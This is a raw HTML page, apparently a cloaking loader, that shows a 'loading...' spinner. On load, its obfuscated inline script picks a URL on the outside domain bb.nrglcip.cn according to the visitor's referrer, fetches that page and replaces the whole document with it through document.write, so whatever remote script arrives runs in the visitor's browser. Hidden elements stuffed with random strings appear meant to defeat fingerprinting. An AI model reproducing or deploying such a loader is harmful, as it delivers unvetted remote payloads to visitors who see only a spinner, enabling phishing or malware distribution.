<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tTeA6C {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tTeA6C .hMHR8kyZA3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tTeA6C .content {
            line-height: 50px;
            text-align: center
        }

        .tTeA6C .img {
            width: 100%
        }

        .tTeA6C .aHBOjiLsMM {
            text-align: center
        }

        .tTeA6C .aHBOjiLsMM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tTeA6C .aHBOjiLsMM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tTeA6C .aHBOjiLsMM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tTeA6C .aHBOjiLsMM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tTeA6C .aHBOjiLsMM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tTeA6C .aHBOjiLsMM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tTeA6C .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XKvGh08syozsK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fsXKUww = XKvGh08syozsK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fsXKUww +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fsXKUww +".html?a=share";
		}
		
        IEcyh3f=url+"#"+new Date().getTime();
        IEcyh3f && function() {
            $.get(IEcyh3f, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >GPkhdebqEef7POo0S67BgarYD44Mjy45QKdA5uOcxeK4ySrfnwoQdX0ciqLRrD6VFrC3K0BQtaWF3GFFPyIig0UtNJ1tfG3IFd</ul>
<a  href='#' style='display:none'>YUbQdOhZt2RZs8W3vVseNTXCbEhJnUZQTOeHIJ94W330tE8kaIZyBd96Cdss6hll2JJ57K5mB4fo15oMRYAohCHtjrrD</a>
<a  href='#' style='display:none'>YUbQdOhZt2RZs8W3vVseNTXCbEhJnUZQTOeHIJ94W330tE8kaIZyBd96Cdss6hll2JJ57K5mB4fo15oMRYAohCHtjrrD</a><div class="tTeA6C">
    <div class="hMHR8kyZA3">
        <div class="aHBOjiLsMM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>M2EDmUtv4n1H0q3EpidcdjDOWPLREoNB4ganjYlazexV2SR0nmsuWj2B3evzVS1dzLAauntS</span>
<b style='display:none' >RcPE6nBaJnWVDg</b>
<p  style='display:none'>bRGMWNd2JxywBl4VIuHX5jWnqsCLyVspQEHShJePyHvpbu94ol</p>
<span style='display:none'>M2EDmUtv4n1H0q3EpidcdjDOWPLREoNB4ganjYlazexV2SR0nmsuWj2B3evzVS1dzLAauntS</span>
<img  src='' style='display:none'>
<span style='display:none'>M2EDmUtv4n1H0q3EpidcdjDOWPLREoNB4ganjYlazexV2SR0nmsuWj2B3evzVS1dzLAauntS</span>
<li style='display:none' >TNvaZjdRktruSFKojmdEvck7KsTSwuOYYdqLL</li></body>
</html>